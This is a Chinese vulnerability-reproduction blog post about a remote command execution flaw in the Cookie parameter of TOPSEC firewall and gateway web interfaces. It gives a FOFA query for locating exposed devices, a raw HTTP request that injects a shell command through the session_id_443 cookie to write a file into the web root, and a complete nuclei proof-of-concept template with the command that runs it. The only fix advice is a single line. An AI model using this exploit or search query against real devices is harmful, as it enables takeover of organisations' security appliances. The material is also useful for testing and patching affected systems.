【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞

admin 2024年1月3日12:51:09评论79 views字数 2193阅读7分18秒阅读模式

使


福利:小编整理了大量电子书和护网常用工具,在文末免费获取。


01

漏洞名称

天融信TOPSEC Cookie 远程命令执行漏洞

02


漏洞影响

天融信TOPSEC

【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞

03


漏洞描述

天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。

04


FOFA搜索语句

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞



05


漏洞复现

第一步,向靶场发送如下数据包,生成一个字符串写入文件

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: x.x.x.xCookie: session_id_443=1|echo 'nvgjngfszfzah1' > /www/htdocs/site/image/ecisas.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

响应内容如下

HTTP/1.1 200 OKPragma: no-cacheSet-Cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/;;session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/cgi/;Content-Length: 122Content-Type: text/html; charset=gb2312Date: Tue, 26 Dec 2023 23:53:28 GMTServer: TOPSECCache-Control: no-cache
<script>alert('操作超时');if(window.opener){window.opener.top.location='/';self.close();}else{top.location='/';}</script>

第二步,访问回显文件

https://x.x.x.x/site/image/ecisas.txt


【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞

漏洞复现成功

06


nuclei poc

poc文件内容如下

id: topsec-maincgi-cookie-rce
info: name: 天融信TOPSEC Cookie 远程命令执行漏洞 author: fgz severity: critical description: 天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。 metadata: max-request: 1 fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode" verified: truevariables: file_name: "{{to_lower(rand_text_alpha(6))}}" file_content: "{{to_lower(rand_text_alpha(15))}}"requests: - raw: - |+ GET /cgi/maincgi.cgi?Url=aa HTTP/1.1 Host: {{Hostname}} Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt; User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- | GET /site/image/{{file_name}}.txt HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
matchers: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

运行POC

nuclei.exe -t mypoc/天融信/topsec-maincgi-cookie-rce.yaml -u https://192.168.40.130  

【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞

07


修复建议

请关注官方补丁。

08


原文始发于微信公众号(AI与网安):【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月3日12:51:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】天融信TOPSEC Cookie 远程命令执行漏洞http://cn-sec.com/archives/2358341.html

发表评论

匿名网友 填写信息